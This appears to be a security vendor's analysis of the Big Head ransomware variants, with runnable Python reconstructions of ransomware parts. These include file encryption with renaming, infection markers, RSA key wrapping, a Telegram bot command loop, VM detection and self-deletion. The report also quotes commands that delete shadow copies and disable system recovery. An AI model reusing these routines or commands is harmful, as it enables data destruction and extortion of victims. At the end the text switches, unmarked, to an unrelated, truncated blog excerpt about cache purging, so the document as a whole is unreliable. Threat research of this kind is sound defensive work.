Tailing Big Head Ransomware’s Variants, Tactics, and Impact

By: Ieriz Nicolle Gonzalez, Katherine Casona, Sarah Pearl Camiling
July 07, 2023

We analyze the technical details of a new ransomware family named Big Head. In this entry, we discuss the Big Head ransomware’s similarities and distinct markers that add more technical details to initial reports on the ransomware.

Reports of a new ransomware family named Big Head emerged in May, with at least two variants of this family documented. Upon closer examination, we discovered that both strains shared a common contact email in their ransom notes, leading us to suspect that the two variants originated from the same malware developer. Looking into these variants further, we uncovered a significant number of versions of this malware. In this entry, we go deeper into the routines of these variants, their similarities and differences, and the potential impact of these infections when abused for attacks.

Analysis

In this section, we expound on the three samples of Big Head we found, as well as their distinct functions and routines. While we continue to investigate and track this threat, we also highly suspect that all three samples of the Big Head ransomware are distributed via malvertisements posing as fake Windows updates and fake Word installers.

First sample

Figure 1. The infection routine of the first Big Head ransomware sample

The first sample of Big Head ransomware (SHA256: 6d27c1b457a34ce9edfb4060d9e04eb44d021a7b03223ee72ca569c8c4215438, detected by Trend Micro as Ransom.MSIL.EGOGEN.THEBBBC) is a .NET-compiled binary. It checks for the mutex 8bikfjjD4JpkkAqrz using CreateMutex and terminates itself if the mutex already exists.

Figure 2. Calling CreateMutex function
Figure 3. MTX value “8bikfjjD4JpkkAqrz”

The sample also has a list of configurations containing details related to the installation process. It specifies various actions such as creating a registry key, checking the existence of a file and overwriting it if necessary, setting system file attributes, and creating an autorun registry entry. These configuration settings are separated by the pipe symbol “|” and are accompanied by corresponding strings that define the specific behavior associated with each action.

Figure 4. List of configurations

The format that the malware adheres to in terms of its behavior upon installation is as follows:

[String ExeName] [bool StartProcess] [bool CheckFileExists] [bool SetSystemAttribute] [String FilePath] [bool SetRegistryKey] [None]
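
The sketch below shows how such a pipe-delimited configuration line could be parsed. This is a minimal illustration, assuming the Boolean fields are the literal strings "true" and "false"; the example line at the end is hypothetical, not taken from the sample.

from typing import NamedTuple

class InstallConfig(NamedTuple):
    exe_name: str
    start_process: bool
    check_file_exists: bool
    set_system_attribute: bool
    file_path: str
    set_registry_key: bool

def parse_config(line: str) -> InstallConfig:
    # Seven pipe-delimited fields; the trailing [None] field is discarded
    exe, start, check, attrib, path, reg, _none = line.split("|")
    as_bool = lambda s: s.strip().lower() == "true"
    return InstallConfig(exe, as_bool(start), as_bool(check),
                         as_bool(attrib), path, as_bool(reg))

# Hypothetical example line (not taken from the sample):
cfg = parse_config("discord.exe|true|true|true|%localappdata%|true|")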

Additionally, we noted the presence of three resources that contained data resembling executable files with the “*.exe” extension:

  • 1.exe drops a copy of itself for propagation. This is a piece of ransomware that checks for the extension “.r3d” before encrypting and appending the “.poop” extension.
  • Archive.exe drops a file named teleratserver.exe, a Telegram bot responsible for establishing communication with the threat actor’s chatbot ID.
  • Xarch.exe drops a file named BXIuSsB.exe, a piece of ransomware that encrypts files and encodes file names to Base64. It also displays a fake Windows update to deceive the victim into thinking that the malicious activity is a legitimate process.

These binaries are encrypted, rendering their contents inaccessible without the appropriate decryption mechanism.

Figure 5. Three resources found in the main sample
Figure 6. The encrypted content of one of the files located within the resource section (“1.exe”)

To extract the three binaries from the resources, the malware employs AES decryption in electronic codebook (ECB) mode. Because ECB encrypts each block independently, this decryption requires only the key and no initialization vector (IV).

It is also noteworthy that the decryption key is derived from the MD5 hash of the mutex 8bikfjjD4JpkkAqrz. This mutex is a hard-coded string whose MD5 hash is used to decrypt the three binaries 1.exe, archive.exe, and Xarch.exe. Note that the MTX value and the encrypted resources differ per sample.

We manually decrypted the content of each binary using only the MD5 hash of the mutex name as the key, then applied AES decryption to recover the encrypted resource files.

Figure 7. Code for decrypting the three binaries (top) and the decrypted binary file that came from the parent file (bottom)
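
Based on this routine, the extraction can be reproduced in a few lines. A minimal sketch follows, assuming the PyCryptodome library and zero-padding of the plaintext (the padding scheme is our assumption):

import hashlib
from Crypto.Cipher import AES   # pip install pycryptodome

MUTEX = "8bikfjjD4JpkkAqrz"     # hard-coded string; differs per sample

def decrypt_resource(blob: bytes) -> bytes:
    key = hashlib.md5(MUTEX.encode()).digest()   # 16-byte AES-128 key
    cipher = AES.new(key, AES.MODE_ECB)          # ECB mode: no IV involved
    return cipher.decrypt(blob).rstrip(b"\x00")  # zero-padding assumed

# Usage: dump a decrypted resource to disk for further analysis
# open("1.exe", "wb").write(decrypt_resource(open("resource.bin", "rb").read()))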

The following table shows the details of the binaries dropped by the decrypted malware using the MTX value 8bikfjjD4JpkkAqrz. These three binaries exhibit similarities with the parent sample in terms of code structure and binary extraction:

File name      Bytes      Dropped file
1.exe          233488     1.exe
archive.exe    12843536   teleratserver.exe
Xarch.exe      65552      BXIuSsB.exe
Figure 8. 1.exe (left), teleratserver.exe (middle), and BXIuSsB.exe (right)

Binaries

This section details the binaries identified in the previous table, beginning with 1.exe, which was dropped by the parent sample.

            1.      Binary: 1.exe
                    Bytes: 222224
                    MTX value that was used to decrypt this file: 2AESRvXK5jbtN9Rvh

Initially, the file hides its console window using the WinAPI function ShowWindow with SW_HIDE (0). The malware creates an autorun registry key, which allows it to execute automatically upon system startup. Additionally, it makes a copy of itself, saved as discord.exe in the <%localappdata%> folder on the local machine.

Figure 9. ShowWindow API code hides the window of the current process (top) and the creation of the registry key and drops a copy of itself as “discord.exe” (bottom)

The Big Head ransomware checks for the victim’s ID in %appdata%\ID. If the ID exists, the ransomware verifies the ID and reads the content. Otherwise, it creates a randomly generated 40-character string and writes it to the file %appdata%\ID as a type of infection marker to identify its victims.

Figure 10. Randomly generating the 40-character string ID (top) and file named ID saved in the “<%appdata%>” folder (bottom)
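
A minimal sketch of this infection-marker logic follows, assuming an alphanumeric character set for the 40-character ID (the exact character set the malware uses is not confirmed):

import os
import random
import string

ID_PATH = os.path.join(os.environ["APPDATA"], "ID")

def get_or_create_victim_id() -> str:
    # An existing marker means the machine was infected before: reuse the ID
    if os.path.exists(ID_PATH):
        with open(ID_PATH) as f:
            return f.read().strip()
    # Otherwise generate a random 40-character ID and persist it as the marker
    victim_id = "".join(random.choices(string.ascii_letters + string.digits, k=40))
    with open(ID_PATH, "w") as f:
        f.write(victim_id)
    return victim_id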

The observed behavior indicates that files with the extension “.r3d” are specifically targeted for encryption using AES, with the key derived from the SHA256 hash of “123” in cipher block chaining (CBC) mode. As a result, the encrypted files end up having the “.poop” extension appended to them.

Figure 11. The malware checks for the extension that contains “.r3d” before encrypting and appending the “.poop” extension (top) and the file encryption process when the file extension “.r3d” exists (bottom)
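
The encryption step can be approximated as follows. This sketch assumes PyCryptodome, PKCS7 padding, and a prepended random IV (padding and IV handling are our assumptions; the key derivation from SHA256 of “123” is as described above):

import hashlib
import os
from Crypto.Cipher import AES            # pip install pycryptodome
from Crypto.Util.Padding import pad

KEY = hashlib.sha256(b"123").digest()    # key derived from SHA256("123")

def encrypt_r3d(path: str) -> None:
    if ".r3d" not in path:               # only files carrying ".r3d" are targeted
        return
    iv = os.urandom(16)                  # IV handling is an assumption
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    with open(path, "rb") as f:
        data = f.read()
    with open(path + ".poop", "wb") as f:   # ".poop" is appended to the name
        f.write(iv + cipher.encrypt(pad(data, AES.block_size)))
    os.remove(path)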

In this file, we also observed how the ransomware deletes its shadow copies. The command used to delete shadow copies and backups, which also disables the recovery option, is as follows:

/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

It drops the ransom note on the desktop, in subdirectories, and in the %appdata% folder. The Big Head ransomware also changes the wallpaper of the victim’s machine.

Figure 12. Ransom note of the “1.exe” binary
Figure 13. The wallpaper that appears on the victim’s machine

Lastly, it executes a command to open a browser and access the malware developer’s Telegram account at hxxps[:]//t[.]me/[REDACTED]_69. Our analysis showed no particular action or communication being exchanged with this account beyond the redirection.

        2.     Binary: teleratserver.exe
                Bytes: 12832480
                MTX value that was used to decrypt this file: OJ4nwj2KO3bCeJoJ1

Teleratserver is a 64-bit Python-compiled binary that acts as a communication channel between the threat actor and the victim via Telegram. It accepts the commands “start”, “help”, “screenshot”, and “message”.

Figure 14. Decompiled Python script from the binary
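
The command handling can be approximated against the standard Telegram Bot HTTP API. The long-polling loop below is a simplified sketch: the token is a placeholder, and the real compiled binary contains more functionality than shown here.

import requests  # talks to the standard Telegram Bot HTTP API

TOKEN = "<bot token>"  # placeholder
API = f"https://api.telegram.org/bot{TOKEN}"

def serve() -> None:
    offset = 0
    while True:
        resp = requests.get(f"{API}/getUpdates",
                            params={"offset": offset, "timeout": 30}).json()
        for update in resp.get("result", []):
            offset = update["update_id"] + 1
            msg = update.get("message") or {}
            text, chat_id = msg.get("text", ""), msg.get("chat", {}).get("id")
            if not chat_id:
                continue
            if text == "start":
                reply = "session opened"
            elif text == "help":
                reply = "commands: start | help | screenshot | message"
            else:
                continue  # "screenshot"/"message" require victim-side actions (omitted)
            requests.post(f"{API}/sendMessage",
                          json={"chat_id": chat_id, "text": reply})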

    3.      Binary: BXIuSsB.exe
             Bytes: 54288
             MTX value that was used to decrypt this file: gdmJp5RKIvzZTepRJ

The malware displays a fake Windows Update UI to deceive the victim into thinking that the malicious activity is a legitimate software update process, with the progress percentage advancing in timed increments of 100 seconds.

Figure 15. The code responsible for fake update (left) and the fake update shown to the user (right)

The malware terminates itself if the user’s system language matches any of the following language codes: Russian, Belarusian, Ukrainian, Kazakh, Kyrgyz, Armenian, Georgian, Tatar, or Uzbek. The malware also disables the Task Manager to prevent users from terminating or investigating its process.

Figure 16. The “KillCtrlAltDelete” command responsible for disabling the Task Manager

The malware drops a copy of itself in a hidden <%temp%\Adobe> folder that it creates, then adds an entry to the RunOnce registry key, ensuring that it runs once at the next system startup.

Figure 17. Creation of AutoRun registry

The malware also randomly generates a 32-character key that will later be used to encrypt files. This key will then be encrypted using RSA-2048 with a hard-coded public key.

The ransomware then drops the ransom note that includes the encrypted key.

Figure 18. The ransom note
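
A sketch of this key-wrapping scheme follows, assuming PyCryptodome, OAEP padding, and Base64 encoding of the wrapped key (the padding scheme and encoding are our assumptions; the hard-coded public key is shown as a placeholder):

import base64
import random
import string
from Crypto.PublicKey import RSA       # pip install pycryptodome
from Crypto.Cipher import PKCS1_OAEP

PUBLIC_KEY_PEM = "-----BEGIN PUBLIC KEY-----\n..."  # hard-coded in the sample (placeholder here)

def generate_wrapped_key() -> tuple[str, str]:
    # Random 32-character file-encryption key
    file_key = "".join(random.choices(string.ascii_letters + string.digits, k=32))
    # Wrap it with the attacker's RSA-2048 public key (OAEP padding assumed)
    cipher = PKCS1_OAEP.new(RSA.import_key(PUBLIC_KEY_PEM))
    wrapped = base64.b64encode(cipher.encrypt(file_key.encode())).decode()
    return file_key, wrapped  # `wrapped` is what appears in the ransom note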

The malware avoids the directories that contain the following substrings:

  • WINDOWS or Windows
  • RECYCLER or Recycler
  • Program Files
  • Program Files (x86)
  • Recycle.Bin or RECYCLE.BIN
  • TEMP or Temp
  • APPDATA or AppData
  • ProgramData
  • Microsoft
  • Burn

By excluding these directories from its malicious activities, the malware reduces the likelihood of being detected by security solutions installed in the system and increases its chances of remaining undetected and operational for a longer duration. The following are the extensions that the Big Head ransomware encrypts:

“.mdf”, “.db”, “.mdb”, “.sql”, “.pdb”, “.pdb”, “.pdb”, “.dsk”, “.fp3”, “.fdb”, “.accdb”, “.dbf”, “.crd”, “.db3”, “.dbk”, “.nsf”, “.gdb”, “.abs”, “.sdb”, “.sdb”, “.sdb”, “.sqlitedb”, “.edb”, “.sdf”, “.sqlite”, “.dbs”, “.cdb”, “.cdb”, “.cdb”, “.bib”, “.dbc”, “.usr”, “.dbt”, “.rsd”, “.myd”, “.pdm”, “.ndf”, “.ask”, “.udb”, “.ns2”, “.kdb”, “.ddl”, “.sqlite3”, “.odb”, “.ib”, “.db2”, “.rdb”, “.wdb”, “.tcx”, “.emd”, “.sbf”, “.accdr”, “.dta”, “.rpd”, “.btr”, “.vdb”, “.daf”, “.dbv”, “.fcd”, “.accde”, “.mrg”, “.nv2”, “.pan”, “.dnc”, “.dxl”, “.tdt”, “.accdc”, “.eco”, “.fmp”, “.vpd”, “.his”, “.fid”

The malware also terminates the following processes:

“taskmgr”, “sqlagent”, “winword”, “sqlbrowser”, “sqlservr”, “sqlwriter”, “oracle”, “ocssd”, “dbsnmp”, “synctime”, “mydesktopqos”, “agntsvc.exeisqlplussvc”, “xfssvccon”, “mydesktopservice”, “ocautoupds”, “agntsvc.exeagntsvc”, “agntsvc.exeencsvc”, “firefoxconfig”, “tbirdconfig”, “ocomm”, “mysqld”, “sql”, “mysqld-nt”, “mysqld-opt”, “dbeng50”, “sqbcoreservice”

The malware renames the encrypted files using Base64. We observed the malware using the LockFile function, which encrypts files by renaming them and adding a marker. This marker serves as an indicator of whether a file has already been encrypted. Through further examination, we saw the function checking for the marker inside the encrypted file; when decrypted, the marker can be matched at the end of the encrypted file.

Figure 19. The LockFile function
Figure 20. Checking for the marker “###” (top) and finding the marker at the end of the encrypted file (bottom)
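
A condensed sketch of this LockFile-style logic follows. The marker value “###” is taken from Figure 20; the encryption of the file contents is omitted, and comparing the raw (rather than decrypted) tail is a simplification:

import base64
import os

MARKER = b"###"   # matched at the end of an encrypted file (per Figure 20)

def is_locked(path: str) -> bool:
    if os.path.getsize(path) < len(MARKER):
        return False
    with open(path, "rb") as f:
        f.seek(-len(MARKER), os.SEEK_END)
        # The real sample decrypts this tail before comparing; we compare raw.
        return f.read() == MARKER

def lock_file(path: str) -> None:
    if is_locked(path):                 # skip files already processed
        return
    # ... AES encryption of the contents happens here (omitted) ...
    with open(path, "ab") as f:
        f.write(MARKER)                 # append the infection marker
    folder, name = os.path.split(path)
    encoded = base64.b64encode(name.encode()).decode()
    os.rename(path, os.path.join(folder, encoded))  # Base64-encoded file name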

The malware targets systems whose operating system uses any of the following language and regional settings:

“ar-SA”, “ar-AE”, “nl-BE”, “nl-NL”, “en-GB”, “en-US”, “en-CA”, “en-AU”, “en-NZ”, “fr-BE”, “fr-CH”, “fr-FR”, “fr-CA”, “fr-LU”, “de-AT”, “de-DE”, “de-CH”, “it-CH”, “it-IT”, “ko-KR”, “pt-PT”, “es-ES”, “sv-FI”, “sv-SE”, “bg-BG”, “ca-ES”, “cs-CZ”, “da-DK”, “el-GR”, “en-IE”, “et-EE”, “eu-ES”, “fi-FI”, “hu-HU”, “ja-JP”, “lt-LT”, “nn-NO”, “pl-PL”, “ro-RO”, “se-FI”, “se-NO”, “se-SE”, “sk-SK”, “sl-SI”, “sv-FI”, “sv-SE”, “tr-TR”

The ransomware checks for strings like VBOX, Virtual, or VMware in the disk enumeration registry key to determine whether the system is operating within a virtual environment. It also scans for processes containing the following substrings: VBox, prl_ (Parallels Desktop), srvc.exe, and vmtoolsd.

Figure 21. Checking for virtual machine identifiers (top) and processes (bottom)
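
A minimal sketch of the registry-based check follows, assuming the standard disk enumeration key commonly used for this technique (the process-name scan would work analogously over a process listing):

import winreg  # Windows-only

VM_MARKERS = ("VBOX", "VIRTUAL", "VMWARE")

def disk_enum_looks_virtual() -> bool:
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                         r"SYSTEM\CurrentControlSet\Services\Disk\Enum")
    _, value_count, _ = winreg.QueryInfoKey(key)
    for i in range(value_count):
        _name, data, _type = winreg.EnumValue(key, i)
        if any(marker in str(data).upper() for marker in VM_MARKERS):
            return True
    return False

if disk_enum_looks_virtual():
    raise SystemExit  # a real sample would bail out or adjust its behavior here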

The malware identifies specific process names associated with virtualization software to determine whether the system is running in a virtualized environment, allowing it to adjust its actions for better success or evasion. It then deletes any available recovery backups using the following command line:

vssadmin delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

After deleting the backups, regardless of the number available, it deletes itself using the SelfDelete() function. This function executes a batch file that deletes the malware executable and then the batch file itself.

Figure 22. SelfDelete function
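
The figure shows the sample’s own implementation. A common way to realize this technique, sketched below under that assumption, is a batch file that loops until the executable can be deleted and then removes itself:

import os
import subprocess
import sys
import tempfile

def self_delete() -> None:
    exe = sys.executable if getattr(sys, "frozen", False) else sys.argv[0]
    bat = os.path.join(tempfile.gettempdir(), "wipe.bat")
    with open(bat, "w") as f:
        f.write(
            "@echo off\n"
            ":retry\n"
            f'del "{exe}"\n'
            f'if exist "{exe}" goto retry\n'   # loop until the file lock is released
            'del "%~f0"\n'                     # finally delete the batch file itself
        )
    subprocess.Popen(["cmd", "/c", bat],
                     creationflags=subprocess.CREATE_NO_WINDOW)
    sys.exit(0)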

Second sample

The second sample of the Big Head ransomware we observed (SHA256: 2a36d1be9330a77f0bc0f7fdc0e903ddd99fcee0b9c93cb69d2f0773f0afd254, detected by Trend as Ransom.MSIL.EGOGEN.THEABBC) exhibits both ransomware and stealer behaviors.

Figure 23. The infection routine of the second sample of the Big Head ransomware

The main file drops and executes the following files:

  • %TEMP%\runyes.Crypter.bat
  • %AppData%\Roaming\azz1.exe
  • %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Server.exe

The ransomware activities are carried out by runyes.Crypter.bat and azz1.exe, while Server.exe is responsible for collecting information for stealing.

The file runyes.Crypter.bat drops a copy of itself and Cipher.psm1 and then executes the following command to begin encryption:

cmd  /c powershell -executionpolicy bypass -win hidden -noexit -file cry.ps1

The malware employs the AES algorithm to encrypt files and adds the suffix “.poop69news@[REDACTED]” to the encrypted files. It specifically targets files with the following extensions:

*.aif ,*.cda ,*.mid ,*.midi ,*.mp3 ,*.mpa ,*.ogg ,*.wav ,*.wma ,*.wpl ,*.7z ,*.arj ,*.deb ,*.pkg ,*.rar ,*.rpm ,*.tar ,*.gz ,*.z ,*.zip ,*.bin ,*.dmg ,*.iso ,*.toas ,*.vcd ,*.csv  ,*.dat ,*.db ,*.dbf ,*.log ,*.mdb ,*.sav ,*.sql ,*.tar ,*.xml ,*.email ,*.eml ,*.emlx ,*.msg ,*.oft ,*.ost ,*.pst ,*.vcf ,*.apk ,*.bat ,*.bin ,*.cgi ,*.pl ,*.com ,*.exe ,*.gadget ,*.jar ,*.msi ,*.py ,*.wsf ,*.fnt ,*.fon ,*.otf ,*.ttf ,*.ai ,*.bmp ,*.gif ,*.ico ,*.jpeg ,*.jpg ,*.png ,*.ps ,*.psd ,*.svg ,*.tif ,*.tiff ,*.asp ,*.aspx ,*.cer ,*.cfm ,*.cgi ,*.pl ,*.css ,*.htm ,*.html ,*.js ,*.jsp ,*.part ,*.php ,*.py ,*.rss ,*.xhtml ,*.key ,*.odp ,*.pps ,*.ppt ,*.pptx ,*.c ,*.class ,*.cpp ,*.cs ,*.h ,*.java ,*.pl ,*.sh ,*.swift ,*.vb ,*.ods ,*.xls ,*.xlsm ,*.xlsx ,*.bak ,*.cab ,*.cfg ,*.cpl ,*.cur ,*.dll ,*.dmp ,*.drv ,*.icns ,*.icoini ,*.lnk ,*.msi ,*.sys ,*.tmp ,*.3g2 ,*.3gp ,*.avi ,*.flv ,*.h264 ,*.m4v ,*.mkv ,*.mov ,*.mp4 ,*.mpg ,*.mpeg ,*.rm ,*.swf ,*.vob ,*.wmv ,*.doc ,*.docx ,*.odt ,*.pdf ,*.rtf ,*.tex ,*.txt ,*.wpd ,*.ps1 ,*.cmd ,*.vbs ,*.vmxf ,*.vmx ,*.vmsd ,*.vmdk ,*.nvram ,*.vbox
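
A sketch of how such an extension filter might select candidate files follows; the extension set here is truncated (the full list is above), and the suffix keeps the redacted email placeholder from the report:

import os

TARGET_EXTS = {".doc", ".docx", ".xls", ".pdf", ".jpg", ".mp4"}  # truncated; full list above
SUFFIX = ".poop69news@[REDACTED]"   # appended suffix; email redacted as in the report

def candidate_files(root: str):
    # Walk the tree and yield files whose extension is on the target list
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in TARGET_EXTS:
                yield os.path.join(dirpath, name)

# Each candidate would then be AES-encrypted and renamed with SUFFIX appended.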

The file azz1.exe, which is also involved in other ransomware activities, establishes a registry entry at <HKCU\Software\Microsoft\Windows\CurrentVersion\Run> to ensure the persistence of a copy of itself. It also drops a file containing the victim’s ID and a ransom note:

Figure 24. The ransom note for the second sample of the Big Head ransomware

Like the first sample, the second sample also changes the victim’s desktop wallpaper. Afterward, it will open the URL hxxps[:]//github[.]com/[REDACTED]_69 using the system’s default web browser. As of this writing, the URL is no longer available.

Other variants of this ransomware used the dropper azz1.exe as well, although the specific file might differ in each binary. Meanwhile, Server.exe, which we have identified as the WorldWind stealer, collects the following data:

  • Browsing history of all available browsers
  • List of directories
  • Replica of drivers
  • List of running processes
  • Product key
  • Networks
  • Screenshot of the screen after running the file

Third sample

The third sample (SHA256: 25294727f7fa59c49ef0181c2c8929474ae38a47b350f7417513f1bacf8939ff, detected by Trend as Ransom.MSIL.EGOGEN.YXDEL) includes a file infector we identified as Neshta in its chain.

Figure 25. The infection routine of the third sample of the Big Head ransomware

Neshta is a virus designed to infect and insert its malicious code into executable files. This malware also has a characteristic behavior of dropping a file called directx.sys, which contains the full path name of the infected file that was last executed. This behavior is not commonly observed in most types of malware, as they typically do not store such specific information in their dropped files.

Incorporating Neshta into the ransomware deployment can also serve as a camouflage technique for the final Big Head ransomware payload. This technique can make the piece of malware appear as a different type of threat, such as a virus, which can divert the prioritization of security solutions that primarily focus on detecting ransomware.

Notably, the ransom note and wallpaper associated with this binary are different from the ones previously mentioned.

Figure 26. Wallpaper (top) and ransom note (bottom) used in the victim’s machine post infection

The Big Head ransomware exhibits unique behaviors during the encryption process: it displays a fake Windows update screen as it encrypts files, deceiving users and effectively locking them out of their machines, and it renames the encrypted files using Base64 encoding, adding a layer of obfuscation that makes it more challenging for users to identify the original names and types of the encrypted files. We also noted the following significant distinctions among the three versions of the Big Head ransomware:

  • The first sample incorporates a backdoor in its infection chain.
  • The second sample employs a trojan spy and/or info stealer.
  • The third sample utilizes a file infector. 

Threat actor

The ransom note clearly indicates that the malware developer utilizes both email and Telegram for communication with their victims. Upon further investigation with the given Telegram username, we were directed to a YouTube account.

The account is relatively new, having joined the platform on April 19, 2023, with a total of 12 published videos as of this writing. The channel showcases demonstrations of the malware the cybercriminals have developed. We also noted that in a pinned comment on each of their videos, they explicitly state their Telegram username.

Figure 27. A new YouTube account with a number of videos featuring pieces of malware (top) and a Telegram username pinned in the comments section for all videos (bottom)

While we suspect that this actor engages in transactions on Telegram, it is worth noting that the YouTube name “aplikasi premium cuma cuma” is a phrase in Bahasa Indonesia that translates to “premium application for free.” We can only speculate on any connection between the ransomware and the countries where that language is spoken.

Insights

Aside from the specific email address tying all the Big Head ransomware samples together, the ransom notes from the samples reference the same Bitcoin wallet and the samples drop the same files. Looking at the samples altogether, all the routines share the same structure in the infection process once the ransomware infects a system.

The malware developers mention in the comment section of their YouTube videos that they have a “new” Telegram account, indicating that an old one was previously used. We also checked their Bitcoin wallet history and found transactions made in 2022. While we are unaware of what those transactions were for, the history implies that these cybercriminals are not new to this type of threat and attack, although they might not be sophisticated actors as a whole.

The discovery of the Big Head ransomware as a developing piece of malware prior to the occurrence of any actual attacks or infections can be seen as a huge advantage for security researchers and analysts. Analysis and reporting of the variants provide an opportunity to analyze the codes, behaviors, and potential vulnerabilities. This information can then be used to develop countermeasures, patch vulnerabilities, and enhance security systems to mitigate future risks.

Moreover, advertising on YouTube without any evidence of “successful penetrations or infections” might seem like premature promotional activity from a non-technical perspective. From a technical point of view, these malware developers left recognizable strings, used predictable encryption methods, and implemented weak or easily detectable evasion techniques, among other “mistakes.”

However, security teams should remain prepared given the malware’s diverse functionalities, encompassing stealers, infectors, and ransomware samples. This multifaceted nature gives the malware the potential to cause significant harm once fully operational, making it more challenging to defend systems against, as each attack vector requires separate attention.

Indicators of Compromise (IOCs)

You can download the IOCs here.


Filename				SHA256									Detection			Description
Read Me First!.txt			Ransom note
1.exe 					6d27c1b457a34ce9edfb4060d9e04eb44d021a7b03223ee72ca569c8c4215438	Ransom.MSIL.EGOGEN.THEBBBC 	First sample
1.exe 					226bec8acd653ea9f4b7ea4eaa75703696863841853f488b0b7d892a6be3832a	Ransom.MSIL.EGOGEN.YXDFE	
123yes.exe 				ff900b9224fde97889d37b81855a976cddf64be50af280e04ce53c587d978840	Ransom.MSIL.EGOGEN.YXDEO	
archive.exe 				cf9410565f8a06af92d65e118bd2dbaeb146d7e51de2c35ba84b47cfa8e4f53b	Ransom.MSIL.EGOGEN.YXDFZ	
azz1.exe, discord.exe 			1c8bc3890f3f202e459fb87acec4602955697eef3b08c93c15ebb0facb019845	Ransom.MSIL.EGOGEN.YXDEW	
BXIuSsB.exe 				64246b9455d76a094376b04a2584d16771cd6164db72287492078719a0c749ab	Ransom.MSIL.EGOGEN.YXDEL	
ConsoleApp2.exe 			0dbfd3479cfaf0856eb8a75f0ad4fccb5fd6bd17164bcfa6a5a386ed7378958d	Ransom.MSIL.EGOGEN.YXDEW	
cry.ps1 				6698f8ffb7ba04c2496634ff69b0a3de9537716cfc8f76d1cfea419dbd880c94	Ransom.PS1.EGOGEN.YXDFV	
Cipher.psm1, 													Ransom.PS1.EGOGEN.YXDFZ	
discord.exe 				b8e456861a5fb452bcf08d7b37277972a4a06b0a928d57c5ec30afa101d77ead	Ransom.MSIL.EGOGEN.YXDEL	
discord.exe 				6b3bf710cf4a0806b2c5eaa26d2d91ca57575248ff0298f6dee7180456f37d2e	Ransom.MSIL.EGOGEN.YXDEL	
docx.Crypter.bat, runyes.Crypter.bat 	6b771983142c7fa72ce209df8423460189c14ec635d6235bf60386317357428a	Ransom.BAT.EGOGEN.YXDFZ 	
event-stream.exe 			627b920845683bd7303d33946ff52fb2ea595208452285457aa5ccd9c01c3b0a	HackTool.Win32.EventStream.A	
l.bat 					40d11a20bd5ca039a15a0de0b1cb83814fa9b1d102585db114bba4c5895a8a44	Ransom.BAT.EGOGEN.YXDFZ	
Locker.ps1 				159fbb0d04c1a77d434ce3810d1e2c659fda0a5703c9d06f89ee8dc556783614	Ransom.PS1.EGOGEN.YXDEL	
locker.ps1 				9aa38796e0ce4866cff8763b026272eb568fa79d8a147f7d61824752ad6d8f09	Ransom.PS1.EGOGEN.YXDFZ	
program.exe 				39caec2f2e9fda6e6a7ce8f22e29e1c77c8f1b4bde80c91f6f78cc819f031756	Ransom.MSIL.EGOGEN.YXDEP	
Prynts.exe 				1ada91cb860cd3318adbb4b6fd097d31ad39c2718b16c136c16407762251c5db	TrojanSpy.MSIL.STORMKITTY.D	
r.pyw 					be6416218e2b1a879e33e0517bcacaefccab6ad2f511de07eebd88821027f92d	Ransom.Python.EGOGEN.YXDFZ 	
Server.exe 				9a7889147fa53311ba7ec8166c785f7a935c35eba4a877c1313a8d2e80e3230d	TrojanSpy.MSIL.WORLDWIND.A	Dropped WorldWind Stealer
Server.exe  				f6a2ec226c84762458d53f5536f0a19e34b2a9b03d574ae78e89098af20bcaa3	PE_NESHTA.A	
sfchost.exe, 12.exe 			1942aac761bc2e21cf303e987ef2a7740a33c388af28ba57787f10b1804ea38e	Ransom.MSIL.EGOGEN.YXDEL	
slam.exe 				f354148b5f0eab5af22e8152438468ae8976db84c65415d3f4a469b35e31710f	Ransom.MSIL.EGOGEN.YXDE4	
ssissa.Crypter.bat  			037f9434e83919506544aa04fecd7f56446a7cc65ee03ac0a11570cf4f607853	Ransom.BAT.EGOGEN.YXDFZ	
svchost.com 				980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2	PE_NESHTA.A-O	
teleratserver.exe 			603fcc53fd7848cd300dad85bef9a6b80acaa7984aa9cb9217cdd012ff1ce5f0	Backdoor.WIn64.TELERAT.A	
Xarch.exe     				bcf8464d042171d7ecaada848b5403b6a810a91f7fd8f298b611e94fa7250463	Ransom.MSIL.EGOGEN.YXDEV	
XarchiveOutput.exe			64aac04ffb290a23ab9f537b1143a4556e6893d9ff7685a11c2c0931d978a931	Ransom.MSIL.EGOGEN.YXDEV	
Xatput.exe 				f59c45b71eb62326d74e83a87f821603bf277465863bfc9c1dcb38a97b0b359d	Ransom.MSIL.EGOGEN.YXDEV	
Xserver.exe 				2a36d1be9330a77f0bc0f7fdc0e903ddd99fcee0b9c93cb69d2f0773f0afd254	Ransom.MSIL.EGOGEN.THEABBC	Second sample
Xsput.exe 				66bb57338bec9110839dc9a83f85b05362ab53686ff7b864d302a217cafb7531	Ransom.MSIL.EGOGEN.YXDEV	
Xsuut.exe 				806f64fda529d92c16fac02e9ddaf468a8cc6cbc710dc0f3be55aec01ed65235	Ransom.MSIL.EGOGEN.YXDEV	
Xxut.exe 				9c1c527a826d16419009a1b7797ed20990b9a04344da9c32deea00378a6eeee2	Ransom.MSIL.EGOGEN.YXDEO 	
iXZAF					40e5050b894cb70c93260645bf9804f50580050eb131e24f30cb91eec9ad1a6e	Ransom.MSIL.EGOGEN.THFBIBC	
XBtput.exe 				25294727f7fa59c49ef0181c2c8929474ae38a47b350f7417513f1bacf8939ff	Ransom.MSIL.EGOGEN.YXDEL	Third sample
XBtput2.exe 				dcfa0fca8c1dd710b4f40784d286c39e5d07b87700bdc87a48659c0426ec6cb6	Ransom.MSIL.EGOGEN.YXDEO	

Source :
https://www.trendmicro.com/it_it/research/23/g/tailing-big-head-ransomware-variants-tactics-and-impact.html

Part 2: Rethinking cache purge with a new architecture

21/06/2023

In Part 1: Rethinking Cache Purge, Fast and Scalable Global Cache Invalidation, we outlined the importance of cache invalidation and the difficulties of purging caches, how our existing purge system was designed and performed, and we gave a high level overview of what we wanted our new Cache Purge system to look like.

It’s been a while since we published the first blog post and it’s time for an update on what we’ve been working on. In this post we’ll be talking about some of the architecture improvements we’ve made so far and what we’re working on now.

Cache Purge end to end

